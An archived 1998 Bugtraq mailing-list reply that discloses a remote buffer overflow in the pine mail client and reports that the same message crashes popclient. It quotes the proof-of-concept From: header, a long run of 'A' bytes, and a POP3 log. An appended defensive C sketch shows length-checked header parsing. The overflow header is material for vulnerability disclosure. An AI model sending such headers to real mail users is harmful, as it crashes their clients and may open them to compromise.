[6990] in bugtraq


Re: another remote pine vunerability

daemon@ATHENA.MIT.EDU (Phillip R. Jaenke)
Thu Jun 18 15:51:44 1998

Date: 	Thu, 18 Jun 1998 14:46:00 -0400
Reply-To: "Phillip R. Jaenke" <prj@nls.net>
From: "Phillip R. Jaenke" <prj@NLS.NET>
X-To:         Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.3.96.980617164950.707A-100000@ppp2-cst105.warszawa.tpnet.pl>

On Wed, 17 Jun 1998, Michal Zalewski wrote:

> Recently I found silly remote overflow in pine. It's so simple there's no
> need to describe it:
>
> From: Michal Zalewski <lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAA>
>
> ...and any attempt of reading this mail will cause:
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()

Also, attempting to so much as download *THIS* email I'm quoting here will
cause a panic in 'popclient.' pine is fine, but popclient can't retrieve
email past this message.

> RETR 9
+OK 3897 octets.
(56 lines of message content)
> DELE 1094795585
doPOP3: cleanUp: Bad file descriptor

The only way to get rid of the offending message is by hand. I'd say we've
stumbled on to something that could be rather painful.

--Phillip R. Jaenke (prj@nls.net - InterNIC: PRJ5)
Head Geek, Linux@Comdex Project - http://comdex.linuxos.org/
TheGuyInCharge(tm), Ketyra Designs, Inc.
"For every step I take, I find somebody stepping on my heels." --anonymous
"That's IT! I'm gonna slap Dr.Watson with a malpractice suit!!" --Keihra
! I reserve the right to bill spammers for my time and disk space !
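
Added example, not part of the original post and not code from pine or popclient: the message number in `DELE 1094795585` above is 0x41414141, the same four 'A' bytes gdb reported in the quoted crash. The sketch below shows a length-checked extraction of the `From:` address and a triage check for such fill-pattern values. The function names, the `ADDR_MAX` cap and the sample header are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ADDR_MAX 256 /* assumed cap: longest mailbox path SMTP (RFC 5321) allows */

/* Copy the address between '<' and '>' of a From: header into out[outsz].
 * Returns 0 on success, -1 if there is no <...> pair (or no room at all),
 * -2 if the address is too long. out is NUL-terminated and never overrun. */
int extract_from_addr(const char *hdr, char *out, size_t outsz)
{
    if (outsz == 0)
        return -1;
    out[0] = '\0';
    const char *lt = strchr(hdr, '<');
    const char *gt = lt ? strchr(lt, '>') : NULL;
    if (!lt || !gt)
        return -1;
    size_t len = (size_t)(gt - lt - 1);
    if (len >= outsz || len > ADDR_MAX)
        return -2;              /* reject instead of truncating or overflowing */
    memcpy(out, lt + 1, len);
    out[len] = '\0';
    return 0;
}

/* Triage helper: true when all four bytes of v are the same printable
 * character, the usual sign of an integer or pointer overwritten by filler. */
int is_fill_pattern(uint32_t v)
{
    unsigned char b = (unsigned char)(v & 0xff);
    return b >= 0x20 && b < 0x7f && v == b * 0x01010101u;
}

int main(void)
{
    /* Constructed sample: a From: header whose address is 1000 'A' bytes. */
    char hdr[1100] = "From: Constructed Sender <";
    size_t n = strlen(hdr);
    memset(hdr + n, 'A', 1000);
    strcpy(hdr + n + 1000, ">");

    char addr[ADDR_MAX + 1];
    printf("oversized header -> %d\n", extract_from_addr(hdr, addr, sizeof addr));
    printf("1094795585 is fill pattern -> %d\n", is_fill_pattern(1094795585u));
    return 0;
}
```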
